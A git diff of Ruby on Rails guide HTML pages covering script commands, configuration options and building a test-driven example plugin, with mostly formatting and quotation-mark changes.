
      runner runs Ruby code in the context of Rails non-interactively. For instance:

      +
      +
      +
      $ ./script/runner "Model.long_running_method"
      +

      1.8. destroy

      +

      Think of destroy as the opposite of generate. It’ll figure out what generate did, and undo it. Believe you-me, the creation of this tutorial used this command many times!

      +
      +
      +
      $ ./script/generate model Oops
      +      exists  app/models/
      +      exists  test/unit/
      +      exists  test/fixtures/
      +      create  app/models/oops.rb
      +      create  test/unit/oops_test.rb
      +      create  test/fixtures/oops.yml
      +      exists  db/migrate
      +      create  db/migrate/20081221040817_create_oops.rb
      +$ ./script/destroy model Oops
      +    notempty  db/migrate
      +    notempty  db
      +          rm  db/migrate/20081221040817_create_oops.rb
      +          rm  test/fixtures/oops.yml
      +          rm  test/unit/oops_test.rb
      +          rm  app/models/oops.rb
      +    notempty  test/fixtures
      +    notempty  test
      +    notempty  test/unit
      +    notempty  test
      +    notempty  app/models
      +    notempty  app
      +

      1.9. about

      +

      Check it: Version numbers for Ruby, RubyGems, Rails, the Rails subcomponents, your application’s folder, the current Rails environment name, your app’s database adapter, and schema version! about is useful when you need to ask help, check if a security patch might affect you, or when you need some stats for an existing Rails installation.

      +
      +
      +
      $ ./script/about
      +About your application's environment
      +Ruby version              1.8.6 (i486-linux)
      +RubyGems version          1.3.1
      +Rails version             2.2.0
      +Active Record version     2.2.0
      +Action Pack version       2.2.0
      +Active Resource version   2.2.0
      +Action Mailer version     2.2.0
      +Active Support version    2.2.0
      +Edge Rails revision       unknown
      +Application root          /home/commandsapp
      +Environment               development
      +Database adapter          sqlite3
      +Database schema version   20081217073400
      diff --git a/railties/doc/guides/html/configuring.html b/railties/doc/guides/html/configuring.html index adc827c89a..3497b09ff9 100644 --- a/railties/doc/guides/html/configuring.html +++ b/railties/doc/guides/html/configuring.html @@ -246,8 +246,8 @@ ul#navMain {

      Configuring Rails Applications

      -

      This guide covers the configuration and initialization features available to Rails applications. By referring to this guide, you will be able to:

      -
        +

        This guide covers the configuration and initialization features available to Rails applications. By referring to this guide, you will be able to:

        +
        • Adjust the behavior of your Rails applications @@ -263,7 +263,7 @@ Add additional code to be run at application start time

        1. Locations for Initialization Code

        -

        preinitializers +

        preinitializers environment.rb first env-specific files initializers (load_application_initializers) @@ -278,10 +278,10 @@ after-initializer

        4. Configuring Rails Components

        4.1. Configuring Active Record

        -

        ActiveRecord::Base includej a variety of configuration options:

        -

        logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then passed on to any new database connections made. You can retrieve this logger by calling logger on either an ActiveRecord model class or an ActiveRecord model instance. Set to nil to disable logging.

        -

        primary_key_prefix_type lets you adjust the naming for primary key columns. By default, Rails assumes that primary key columns are named id (and this configuration option doesn't need to be set.) There are two other choices:

        -
          +

          ActiveRecord::Base includej a variety of configuration options:

          +

          logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then passed on to any new database connections made. You can retrieve this logger by calling logger on either an ActiveRecord model class or an ActiveRecord model instance. Set to nil to disable logging.

          +

          primary_key_prefix_type lets you adjust the naming for primary key columns. By default, Rails assumes that primary key columns are named id (and this configuration option doesn’t need to be set.) There are two other choices:

          +
          • :table_name would make the primary key for the Customer class customerid @@ -293,54 +293,54 @@ after-initializer

        -

        table_name_prefix lets you set a global string to be prepended to table names. If you set this to northwest_, then the Customer class will look for northwest_customers as its table. The default is an empty string.

        -

        table_name_suffix lets you set a global string to be appended to table names. If you set this to _northwest, then the Customer class will look for customers_northwest as its table. The default is an empty string.

        -

        pluralize_table_names specifies whether Rails will look for singular or plural table names in the database. If set to true (the default), then the Customer class will use the customers table. If set to false, then the Customers class will use the customer table.

        -

        colorize_logging (true by default) specifies whether or not to use ANSI color codes when logging information from ActiveRecord.

        -

        default_timezone determines whether to use Time.local (if set to :local) or Time.utc (if set to :utc) when pulling dates and times from the database. The default is :local.

        -

        schema_format controls the format for dumping the database schema to a file. The options are :ruby (the default) for a database-independent version that depends on migrations, or :sql for a set of (potentially database-dependent) SQL statements.

        -

        timestamped_migrations controls whether migrations are numbered with serial integers or with timestamps. The default is true, to use timestamps, which are preferred if there are multiple developers working on the same application.

        -

        lock_optimistically controls whether ActiveRecord will use optimistic locking. By default this is true.

        -

        The MySQL adapter adds one additional configuration option:

        -

        ActiveRecord::ConnectionAdapters::MysqlAdapter.emulate_booleans controls whether ActiveRecord will consider all tinyint(1) columns in a MySQL database to be booleans. By default this is true.

        -

        The schema dumper adds one additional configuration option:

        -

        ActiveRecord::SchemaDumper.ignore_tables accepts an array of tables that should not be included in any generated schema file. This setting is ignored unless ActiveRecord::Base.schema_format == :ruby.

        +

        table_name_prefix lets you set a global string to be prepended to table names. If you set this to northwest_, then the Customer class will look for northwest_customers as its table. The default is an empty string.

        +

        table_name_suffix lets you set a global string to be appended to table names. If you set this to _northwest, then the Customer class will look for customers_northwest as its table. The default is an empty string.

        +

        pluralize_table_names specifies whether Rails will look for singular or plural table names in the database. If set to true (the default), then the Customer class will use the customers table. If set to false, then the Customers class will use the customer table.

        +

        colorize_logging (true by default) specifies whether or not to use ANSI color codes when logging information from ActiveRecord.

        +

        default_timezone determines whether to use Time.local (if set to :local) or Time.utc (if set to :utc) when pulling dates and times from the database. The default is :local.

        +

        schema_format controls the format for dumping the database schema to a file. The options are :ruby (the default) for a database-independent version that depends on migrations, or :sql for a set of (potentially database-dependent) SQL statements.

        +

        timestamped_migrations controls whether migrations are numbered with serial integers or with timestamps. The default is true, to use timestamps, which are preferred if there are multiple developers working on the same application.

        +

        lock_optimistically controls whether ActiveRecord will use optimistic locking. By default this is true.

        +

        The MySQL adapter adds one additional configuration option:

        +

        ActiveRecord::ConnectionAdapters::MysqlAdapter.emulate_booleans controls whether ActiveRecord will consider all tinyint(1) columns in a MySQL database to be booleans. By default this is true.

        +

        The schema dumper adds one additional configuration option:

        +

        ActiveRecord::SchemaDumper.ignore_tables accepts an array of tables that should not be included in any generated schema file. This setting is ignored unless ActiveRecord::Base.schema_format == :ruby.

        4.2. Configuring Action Controller

        -

        ActionController::Base includes a number of configuration settings:

        -

        asset_host provides a string that is prepended to all of the URL-generating helpers in AssetHelper. This is designed to allow moving all javascript, CSS, and image files to a separate asset host.

        -

        consider_all_requests_local is generally set to true during development and false during production; if it is set to true, then any error will cause detailed debugging information to be dumped in the HTTP response. For finer-grained control, set this to false and implement local_request? to specify which requests should provide debugging information on errors.

        -

        allow_concurrency should be set to true to allow concurrent (threadsafe) action processing. Set to false by default.

        -

        param_parsers provides an array of handlers that can extract information from incoming HTTP requests and add it to the params hash. By default, parsers for multipart forms, URL-encoded forms, XML, and JSON are active.

        -

        default_charset specifies the default character set for all renders. The default is "utf-8".

        -

        logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Action Controller. Set to nil to disable logging.

        -

        resource_action_separator gives the token to be used between resources and actions when building or interpreting RESTful URLs. By default, this is "/".

        -

        resource_path_names is a hash of default names for several RESTful actions. By default, the new action is named new and the edit action is named edit.

        -

        request_forgery_protection_token sets the token parameter name for RequestForgery. Calling protect_from_forgery sets it to :authenticity_token by default.

        -

        optimise_named_routes turns on some optimizations in generating the routing table. It is set to true by default.

        -

        use_accept_header sets the rules for determining the response format. If this is set to true (the default) then respond_to and Request#format will take the Accept header into account. If it is set to false then the request format will be determined solely by examining params[:format]. If there is no format parameter, then the response format will be either HTML or Javascript depending on whether the request is an AJAX request.

        -

        allow_forgery_protection enables or disables CSRF protection. By default this is false in test mode and true in all other modes.

        -

        relative_url_root can be used to tell Rails that you are deploying to a subdirectory. The default is ENV[RAILS_RELATIVE_URL_ROOT].

        -

        The caching code adds two additional settings:

        -

        ActionController::Caching::Pages.page_cache_directory sets the directory where Rails will create cached pages for your web server. The default is Rails.public_path (which is usually set to RAILS_ROOT "/public"+).

        -

        ActionController::Caching::Pages.page_cache_extension sets the extension to be used when generating pages for the cache (this is ignored if the incoming request already has an extension). The default is .html.

        -

        The dispatcher includes one setting:

        -

        ActionController::Dispatcher.error_file_path gives the path where Rails will look for error files such as 404.html. The default is Rails.public_path.

        -

        The Active Record session store can also be configured:

        -

        CGI::Session::ActiveRecordStore::Session.data_column_name sets the name of the column to use to store session data. By default it is data

        +

        ActionController::Base includes a number of configuration settings:

        +

        asset_host provides a string that is prepended to all of the URL-generating helpers in AssetHelper. This is designed to allow moving all javascript, CSS, and image files to a separate asset host.

        +

        consider_all_requests_local is generally set to true during development and false during production; if it is set to true, then any error will cause detailed debugging information to be dumped in the HTTP response. For finer-grained control, set this to false and implement local_request? to specify which requests should provide debugging information on errors.

        +

        allow_concurrency should be set to true to allow concurrent (threadsafe) action processing. Set to false by default.

        +

        param_parsers provides an array of handlers that can extract information from incoming HTTP requests and add it to the params hash. By default, parsers for multipart forms, URL-encoded forms, XML, and JSON are active.

        +

        default_charset specifies the default character set for all renders. The default is "utf-8".

        +

        logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Action Controller. Set to nil to disable logging.

        +

        resource_action_separator gives the token to be used between resources and actions when building or interpreting RESTful URLs. By default, this is "/".

        +

        resource_path_names is a hash of default names for several RESTful actions. By default, the new action is named new and the edit action is named edit.

        +

        request_forgery_protection_token sets the token parameter name for RequestForgery. Calling protect_from_forgery sets it to :authenticity_token by default.

        +

        optimise_named_routes turns on some optimizations in generating the routing table. It is set to true by default.

        +

        use_accept_header sets the rules for determining the response format. If this is set to true (the default) then respond_to and Request#format will take the Accept header into account. If it is set to false then the request format will be determined solely by examining params[:format]. If there is no format parameter, then the response format will be either HTML or Javascript depending on whether the request is an AJAX request.

        +

        allow_forgery_protection enables or disables CSRF protection. By default this is false in test mode and true in all other modes.

        +

        relative_url_root can be used to tell Rails that you are deploying to a subdirectory. The default is ENV[RAILS_RELATIVE_URL_ROOT].

        +

        The caching code adds two additional settings:

        +

        ActionController::Caching::Pages.page_cache_directory sets the directory where Rails will create cached pages for your web server. The default is Rails.public_path (which is usually set to RAILS_ROOT + "/public").

        +

        ActionController::Caching::Pages.page_cache_extension sets the extension to be used when generating pages for the cache (this is ignored if the incoming request already has an extension). The default is .html.

        +

        The dispatcher includes one setting:

        +

        ActionController::Dispatcher.error_file_path gives the path where Rails will look for error files such as 404.html. The default is Rails.public_path.

        +

        The Active Record session store can also be configured:

        +

        CGI::Session::ActiveRecordStore::Session.data_column_name sets the name of the column to use to store session data. By default it is data

        4.3. Configuring Action View

        -

        There are only a few configuration options for Action View, starting with four on ActionView::Base:

        -

        debug_rjs specifies whether RJS responses should be wrapped in a try/catch block that alert()s the caught exception (and then re-raises it). The default is false.

        -

        warn_cache_misses tells Rails to display a warning whenever an action results in a cache miss on your view paths. The default is false.

        -

        -

        default_form_builder tells Rails which form builder to use by default. The default is ActionView::Helpers::FormBuilder.

        -

        The ERB template handler supplies one additional option:

        -

        ActionView::TemplateHandlers::ERB.erb_trim_mode gives the trim mode to be used by ERB. It defaults to -. See the ERB documentation for more information.

        +

        There are only a few configuration options for Action View, starting with four on ActionView::Base:

        +

        debug_rjs specifies whether RJS responses should be wrapped in a try/catch block that alert()s the caught exception (and then re-raises it). The default is false.

        +

        warn_cache_misses tells Rails to display a warning whenever an action results in a cache miss on your view paths. The default is false.

        +

        +

        default_form_builder tells Rails which form builder to use by default. The default is ActionView::Helpers::FormBuilder.

        +

        The ERB template handler supplies one additional option:

        +

        ActionView::TemplateHandlers::ERB.erb_trim_mode gives the trim mode to be used by ERB. It defaults to -. See the ERB documentation for more information.

        4.4. Configuring Action Mailer

        -

        There are a number of settings available on ActionMailer::Base:

        -

        template_root gives the root folder for Action Mailer templates.

        -

        logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Action Mailer. Set to nil to disable logging.

        -

        smtp_settings allows detailed configuration for the :smtp delivery method. It accepts a hash of options, which can include any of these options:

        -
          +

          There are a number of settings available on ActionMailer::Base:

          +

          template_root gives the root folder for Action Mailer templates.

          +

          logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Action Mailer. Set to nil to disable logging.

          +

          smtp_settings allows detailed configuration for the :smtp delivery method. It accepts a hash of options, which can include any of these options:

          +
          • <tt>:address</tt> - Allows you to use a remote mail server. Just change it from its default "localhost" setting. @@ -348,7 +348,7 @@ after-initializer

        • -<tt>:port</tt> - On the off chance that your mail server doesn't run on port 25, you can change it. +<tt>:port</tt> - On the off chance that your mail server doesn’t run on port 25, you can change it.

        • @@ -372,8 +372,8 @@ after-initializer

      -

      sendmail_settings allows detailed configuration for the sendmail delivery method. It accepts a hash of options, which can include any of these options:

      -
        +

        sendmail_settings allows detailed configuration for the sendmail delivery method. It accepts a hash of options, which can include any of these options:

        +
        • <tt>:location</tt> - The location of the sendmail executable. Defaults to <tt>/usr/sbin/sendmail</tt>. @@ -385,27 +385,27 @@ after-initializer

      -

      raise_delivery_errors specifies whether to raise an error if email delivery cannot be completed. It defaults to true.

      -

      delivery_method defines the delivery method. The allowed values are <tt>:smtp</tt> (default), <tt>:sendmail</tt>, and <tt>:test</tt>.

      -

      perform_deliveries specifies whether mail will actually be delivered. By default this is true; it can be convenient to set it to false for testing.

      -

      default_charset tells Action Mailer which character set to use for the body and for encoding the subject. It defaults to utf-8.

      -

      default_content_type specifies the default content type used for the main part of the message. It defaults to "text/plain"

      -

      default_mime_version is the default MIME version for the message. It defaults to 1.0.

      -

      default_implicit_parts_order - When a message is built implicitly (i.e. multiple parts are assembled from templates +

      raise_delivery_errors specifies whether to raise an error if email delivery cannot be completed. It defaults to true.

      +

      delivery_method defines the delivery method. The allowed values are <tt>:smtp</tt> (default), <tt>:sendmail</tt>, and <tt>:test</tt>.

      +

      perform_deliveries specifies whether mail will actually be delivered. By default this is true; it can be convenient to set it to false for testing.

      +

      default_charset tells Action Mailer which character set to use for the body and for encoding the subject. It defaults to utf-8.

      +

      default_content_type specifies the default content type used for the main part of the message. It defaults to "text/plain"

      +

      default_mime_version is the default MIME version for the message. It defaults to 1.0.

      +

      default_implicit_parts_order - When a message is built implicitly (i.e. multiple parts are assembled from templates which specify the content type in their filenames) this variable controls how the parts are ordered. Defaults to <tt>["text/html", "text/enriched", "text/plain"]</tt>. Items that appear first in the array have higher priority in the mail client and appear last in the mime encoded message.

      4.5. Configuring Active Resource

      -

      There is a single configuration setting available on ActiveResource::Base:

      -

      logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Active Resource. Set to nil to disable logging.

      +

      There is a single configuration setting available on ActiveResource::Base:

      +

      logger accepts a logger conforming to the interface of Log4r or the default Ruby 1.8+ Logger class, which is then used to log information from Active Resource. Set to nil to disable logging.

      4.6. Configuring Active Support

      -

      There are a few configuration options available in Active Support:

      -

      ActiveSupport::BufferedLogger.silencer is set to false to disable the ability to silence logging in a block. The default is true.

      -

      ActiveSupport::Cache::Store.logger specifies the logger to use within cache store operations.

      -

      ActiveSupport::Logger.silencer is set to false to disable the ability to silence logging in a block. The default is true.

      +

      There are a few configuration options available in Active Support:

      +

      ActiveSupport::BufferedLogger.silencer is set to false to disable the ability to silence logging in a block. The default is true.

      +

      ActiveSupport::Cache::Store.logger specifies the logger to use within cache store operations.

      +

      ActiveSupport::Logger.silencer is set to false to disable the ability to silence logging in a block. The default is true.

      4.7. Configuring Active Model

      -

      Active Model currently has a single configuration setting:

      -

      +ActiveModel::Errors.default_error_messages is an array containing all of the validation error messages.

      +

      Active Model currently has a single configuration setting:

      +

      +ActiveModel::Errors.default_error_messages is an array containing all of the validation error messages.

      5. Using Initializers

      @@ -419,12 +419,12 @@ and appear last in the mime encoded message.

      7. Rails Environment Settings

      -

      ENV

      +

      ENV

      8. Changelog

      - -
        + +
        • November 5, 2008: Rough outline by Mike Gunderloy diff --git a/railties/doc/guides/html/creating_plugins.html b/railties/doc/guides/html/creating_plugins.html index 850822c8ed..2eca3b74b8 100644 --- a/railties/doc/guides/html/creating_plugins.html +++ b/railties/doc/guides/html/creating_plugins.html @@ -303,8 +303,8 @@ ul#navMain {

          The Basics of Creating Rails Plugins

          -

          A Rails plugin is either an extension or a modification of the core framework. Plugins provide:

          -
            +

            A Rails plugin is either an extension or a modification of the core framework. Plugins provide:

            +
            • a way for developers to share bleeding-edge ideas without hurting the stable code base @@ -321,8 +321,8 @@ an outlet for the core developers so that they don’t have to include every coo

            -

            After reading this guide you should be familiar with:

            -
              +

              After reading this guide you should be familiar with:

              +
              • Creating a plugin from scratch @@ -359,8 +359,8 @@ Avoiding common pitfalls with init.rb

              -

              This guide describes how to build a test-driven plugin that will:

              -
                +

                This guide describes how to build a test-driven plugin that will:

                +
                • Extend core ruby classes like Hash and String @@ -392,13 +392,13 @@ A custom route method that can be used in routes.rb

                -

                For the purpose of this guide pretend for a moment that you are an avid bird watcher. Your favorite bird is the Yaffle, and you want to create a plugin that allows other developers to share in the Yaffle goodness. First, you need to get setup for development.

                +

                For the purpose of this guide pretend for a moment that you are an avid bird watcher. Your favorite bird is the Yaffle, and you want to create a plugin that allows other developers to share in the Yaffle goodness. First, you need to get setup for development.

            1. Setup

            1.1. Create the basic app

            -

            The examples in this guide require that you have a working rails application. To create a simple rails app execute:

            +

            The examples in this guide require that you have a working rails application. To create a simple rails app execute:

            gem install rails
            @@ -408,32 +408,32 @@ script/generate scaffold bird name:string
             rake db:migrate
             script/server
            -

            Then navigate to http://localhost:3000/birds. Make sure you have a functioning rails app before continuing.

            +

            Then navigate to http://localhost:3000/birds. Make sure you have a functioning rails app before continuing.

            +
            Editor’s note:
            The aforementioned instructions will work for sqlite3. For more detailed instructions on how to create a rails app for other databases see the API docs.
            Note -
            Editor's note:
            The aforementioned instructions will work for sqlite3. For more detailed instructions on how to create a rails app for other databases see the API docs.

            1.2. Generate the plugin skeleton

            -

            Rails ships with a plugin generator which creates a basic plugin skeleton. Pass the plugin name, either CamelCased or under_scored, as an argument. Pass --with-generator to add an example generator also.

            -

            This creates a plugin in vendor/plugins including an init.rb and README as well as standard lib, task, and test directories.

            -

            Examples:

            +

            Rails ships with a plugin generator which creates a basic plugin skeleton. Pass the plugin name, either CamelCased or under_scored, as an argument. Pass --with-generator to add an example generator also.

            +

            This creates a plugin in vendor/plugins including an init.rb and README as well as standard lib, task, and test directories.

            +

            Examples:

            ./script/generate plugin yaffle
             ./script/generate plugin yaffle --with-generator
            -

            To get more detailed help on the plugin generator, type ./script/generate plugin.

            -

            Later on this guide will describe how to work with generators, so go ahead and generate your plugin with the --with-generator option now:

            +

            To get more detailed help on the plugin generator, type ./script/generate plugin.

            +

            Later on this guide will describe how to work with generators, so go ahead and generate your plugin with the --with-generator option now:

            ./script/generate plugin yaffle --with-generator
            -

            You should see the following output:

            +

            You should see the following output:

            create  vendor/plugins/yaffle/lib
            @@ -455,7 +455,7 @@ create  vendor/plugins/yaffle/generators/yaffle/yaffle_generator.rb
             create  vendor/plugins/yaffle/generators/yaffle/USAGE

            1.3. Organize your files

            -

            To make it easy to organize your files and to make the plugin more compatible with GemPlugins, start out by altering your file system to look like this:

            +

            To make it easy to organize your files and to make the plugin more compatible with GemPlugins, start out by altering your file system to look like this:

            |-- lib
            @@ -465,20 +465,19 @@ create  vendor/plugins/yaffle/generators/yaffle/USAGE
            | `-- init.rb
            -

            vendor/plugins/yaffle/rails/init.rb

            +

            vendor/plugins/yaffle/rails/init.rb

            -
            require 'yaffle'
            -
            -

            Now you can add any require statements to lib/yaffle.rb and keep init.rb clean.

            +
            require 'yaffle'
          +

          Now you can add any require statements to lib/yaffle.rb and keep init.rb clean.

          2. Tests

          -

          In this guide you will learn how to test your plugin against multiple different database adapters using Active Record. To setup your plugin to allow for easy testing you'll need to add 3 files:

          -
            +

            In this guide you will learn how to test your plugin against multiple different database adapters using Active Record. To setup your plugin to allow for easy testing you’ll need to add 3 files:

            +
            • A database.yml file with all of your connection strings @@ -496,7 +495,7 @@ A test helper method that sets up the database

            2.1. Test Setup

            -

            vendor/plugins/yaffle/test/database.yml:

            +

            vendor/plugins/yaffle/test/database.yml:

            sqlite:
            @@ -521,8 +520,8 @@ mysql:
               :password: password
               :database: yaffle_plugin_test
            -

            For this guide you'll need 2 tables/models, Hickwalls and Wickwalls, so add the following:

            -

            vendor/plugins/yaffle/test/schema.rb:

            +

            For this guide you’ll need 2 tables/models, Hickwalls and Wickwalls, so add the following:

            +

            vendor/plugins/yaffle/test/schema.rb:

            create_table :woodpeckers, :force => true do |t| t.string :name end -end -
            -

            vendor/plugins/yaffle/test/test_helper.rb:

            +end
          +

          vendor/plugins/yaffle/test/test_helper.rb:

          assert_equal [], Wickwall.all end -end -
          -

          To run this, go to the plugin directory and run rake:

          +end
        +

        To run this, go to the plugin directory and run rake:

        cd vendor/plugins/yaffle
         rake
        -

        You should see output like:

        +

        You should see output like:

        /opt/local/bin/ruby -Ilib:lib "/opt/local/lib/ruby/gems/1.8/gems/rake-0.8.3/lib/rake/rake_test_loader.rb" "test/yaffle_test.rb"
        @@ -637,7 +633,7 @@ Finished in 0.002236 seconds.
         
         1 test, 1 assertion, 0 failures, 0 errors
        -

        By default the setup above runs your tests with sqlite or sqlite3. To run tests with one of the other connection strings specified in database.yml, pass the DB environment variable to rake:

        +

        By default the setup above runs your tests with sqlite or sqlite3. To run tests with one of the other connection strings specified in database.yml, pass the DB environment variable to rake:

        rake DB=sqlite
        @@ -645,13 +641,13 @@ rake DB=sqlite3
         rake DB=mysql
         rake DB=postgresql
        -

        Now you are ready to test-drive your plugin!

        +

        Now you are ready to test-drive your plugin!

      3. Extending core classes

      -

      This section will explain how to add a method to String that will be available anywhere in your rails app.

      -

      In this example you will add a method to String named to_squawk. To begin, create a new test file with a few assertions:

      -

      vendor/plugins/yaffle/test/core_ext_test.rb

      +

      This section will explain how to add a method to String that will be available anywhere in your rails app.

      +

      In this example you will add a method to String named to_squawk. To begin, create a new test file with a few assertions:

      +

      vendor/plugins/yaffle/test/core_ext_test.rb

      def test_to_squawk_prepends_the_word_squawk assert_equal "squawk! Hello World", "Hello World".to_squawk end -end -
      -

      Navigate to your plugin directory and run rake test:

      +end
      +

      Navigate to your plugin directory and run rake test:

      cd vendor/plugins/yaffle
       rake test
      -

      The test above should fail with the message:

      +

      The test above should fail with the message:

       1) Error:
      @@ -679,18 +674,17 @@ test_to_squawk_prepends_the_word_squawk(CoreExtTest):
       NoMethodError: undefined method `to_squawk' for "Hello World":String
           ./test/core_ext_test.rb:5:in `test_to_squawk_prepends_the_word_squawk'
      -

      Great - now you are ready to start development.

      -

      Then in lib/yaffle.rb require lib/core_ext.rb:

      -

      vendor/plugins/yaffle/lib/yaffle.rb

      +

      Great - now you are ready to start development.

      +

      Then in lib/yaffle.rb require lib/core_ext.rb:

      +

      vendor/plugins/yaffle/lib/yaffle.rb

      -
      require "yaffle/core_ext"
      -
      -

      Finally, create the core_ext.rb file and add the to_squawk method:

      -

      vendor/plugins/yaffle/lib/yaffle/core_ext.rb

      +
      require "yaffle/core_ext"
      +

      Finally, create the core_ext.rb file and add the to_squawk method:

      +

      vendor/plugins/yaffle/lib/yaffle/core_ext.rb

      def to_squawk "squawk! #{self}".strip end -end -
      -

      To test that your method does what it says it does, run the unit tests with rake from your plugin directory. To see this in action, fire up a console and start squawking:

      +end +

      To test that your method does what it says it does, run the unit tests with rake from your plugin directory. To see this in action, fire up a console and start squawking:

      $ ./script/console
      @@ -710,10 +703,10 @@ http://www.gnu.org/software/src-highlite -->
       => "squawk! Hello World"

      3.1. Working with init.rb

      -

      When rails loads plugins it looks for the file named init.rb or rails/init.rb. However, when the plugin is initialized, init.rb is invoked via eval (not require) so it has slightly different behavior.

      -

      Under certain circumstances if you reopen classes or modules in init.rb you may inadvertently create a new class, rather than reopening an existing class. A better alternative is to reopen the class in a different file, and require that file from init.rb, as shown above.

      -

      If you must reopen a class in init.rb you can use module_eval or class_eval to avoid any issues:

      -

      vendor/plugins/yaffle/rails/init.rb

      +

      When rails loads plugins it looks for the file named init.rb or rails/init.rb. However, when the plugin is initialized, init.rb is invoked via eval (not require) so it has slightly different behavior.

      +

      Under certain circumstances if you reopen classes or modules in init.rb you may inadvertently create a new class, rather than reopening an existing class. A better alternative is to reopen the class in a different file, and require that file from init.rb, as shown above.

      +

      If you must reopen a class in init.rb you can use module_eval or class_eval to avoid any issues:

      +

      vendor/plugins/yaffle/rails/init.rb

      def is_a_special_hash? true end -end -
      -

      Another way is to explicitly define the top-level module space for all modules and classes, like ::Hash:

      -

      vendor/plugins/yaffle/rails/init.rb

      +end +

      Another way is to explicitly define the top-level module space for all modules and classes, like ::Hash:

      +

      vendor/plugins/yaffle/rails/init.rb

      def is_a_special_hash? true end -end -
      +end

      4. Add an acts_as method to Active Record

      -

      A common pattern in plugins is to add a method called acts_as_something to models. In this case, you want to write a method called acts_as_yaffle that adds a squawk method to your models.

      -

      To begin, set up your files so that you have:

      -

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      +

      A common pattern in plugins is to add a method called acts_as_something to models. In this case, you want to write a method called acts_as_yaffle that adds a squawk method to your models.

      +

      To begin, set up your files so that you have:

      +

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      require File.dirname(__FILE__) + '/test_helper.rb'
       
       class ActsAsYaffleTest < Test::Unit::TestCase
      -end
      -
      -

      vendor/plugins/yaffle/lib/yaffle.rb

      +end
      +

      vendor/plugins/yaffle/lib/yaffle.rb

      -
      require 'yaffle/acts_as_yaffle'
      -
      -

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      +
      require 'yaffle/acts_as_yaffle'
      +

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      module Yaffle
         # your code will go here
      -end
      -
      -

      Note that after requiring acts_as_yaffle you also have to include it into ActiveRecord::Base so that your plugin methods will be available to the rails models.

      -

      One of the most common plugin patterns for acts_as_yaffle plugins is to structure your file like so:

      -

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      +end +

      Note that after requiring acts_as_yaffle you also have to include it into ActiveRecord::Base so that your plugin methods will be available to the rails models.

      +

      One of the most common plugin patterns for acts_as_yaffle plugins is to structure your file like so:

      +

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      module InstanceMethods # any method placed here will apply to instaces, like @hickwall end -end -
      -

      With structure you can easily separate the methods that will be used for the class (like Hickwall.some_method) and the instance (like @hickwell.some_method).

      +end +

      With structure you can easily separate the methods that will be used for the class (like Hickwall.some_method) and the instance (like @hickwell.some_method).

      4.1. Add a class method

      -

      This plugin will expect that you've added a method to your model named last_squawk. However, the plugin users might have already defined a method on their model named last_squawk that they use for something else. This plugin will allow the name to be changed by adding a class method called yaffle_text_field.

      -

      To start out, write a failing test that shows the behavior you'd like:

      -

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      +

      This plugin will expect that you’ve added a method to your model named last_squawk. However, the plugin users might have already defined a method on their model named last_squawk that they use for something else. This plugin will allow the name to be changed by adding a class method called yaffle_text_field.

      +

      To start out, write a failing test that shows the behavior you’d like:

      +

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      def test_a_wickwalls_yaffle_text_field_should_be_last_tweet assert_equal "last_tweet", Wickwall.yaffle_text_field end -end -
      -

      To make these tests pass, you could modify your acts_as_yaffle file like so:

      -

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      +end +

      To make these tests pass, you could modify your acts_as_yaffle file like so:

      +

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      end end -ActiveRecord::Base.send :include, Yaffle -
      +ActiveRecord::Base.send :include, Yaffle

      4.2. Add an instance method

      -

      This plugin will add a method named squawk to any Active Record objects that call acts_as_yaffle. The squawk method will simply set the value of one of the fields in the database.

      -

      To start out, write a failing test that shows the behavior you'd like:

      -

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      +

      This plugin will add a method named squawk to any Active Record objects that call acts_as_yaffle. The squawk method will simply set the value of one of the fields in the database.

      +

      To start out, write a failing test that shows the behavior you’d like:

      +

      vendor/plugins/yaffle/test/acts_as_yaffle_test.rb

      wickwall.squawk("Hello World") assert_equal "squawk! Hello World", wickwall.last_tweet end -end -
      -

      Run this test to make sure the last two tests fail, then update acts_as_yaffle.rb to look like this:

      -

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      +end +

      Run this test to make sure the last two tests fail, then update acts_as_yaffle.rb to look like this:

      +

      vendor/plugins/yaffle/lib/yaffle/acts_as_yaffle.rb

      end end -ActiveRecord::Base.send :include, Yaffle -
      +ActiveRecord::Base.send :include, Yaffle
      +
      Editor’s note:
      The use of write_attribute to write to the field in model is just one example of how a plugin can interact with the model, and will not always be the right method to use. For example, you could also use send("#{self.class.yaffle_text_field}=", string.to_squawk).
      Note -
      Editor's note:
      The use of write_attribute to write to the field in model is just one example of how a plugin can interact with the model, and will not always be the right method to use. For example, you could also use send("#{self.class.yaffle_text_field}=", string.to_squawk).

      5. Models

      -

      This section describes how to add a model named Woodpecker to your plugin that will behave the same as a model in your main app. When storing models, controllers, views and helpers in your plugin, it's customary to keep them in directories that match the rails directories. For this example, create a file structure like this:

      +

      This section describes how to add a model named Woodpecker to your plugin that will behave the same as a model in your main app. When storing models, controllers, views and helpers in your plugin, it’s customary to keep them in directories that match the rails directories. For this example, create a file structure like this:

      vendor/plugins/yaffle/
      @@ -952,8 +935,8 @@ ActiveRecord::Base

      As always, start with a test:

      -

      vendor/plugins/yaffle/yaffle/woodpecker_test.rb:

      +

      As always, start with a test:

      +

      vendor/plugins/yaffle/yaffle/woodpecker_test.rb:

      def test_woodpecker assert_kind_of Woodpecker, Woodpecker.new end -end -
      -

      This is just a simple test to make sure the class is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      -

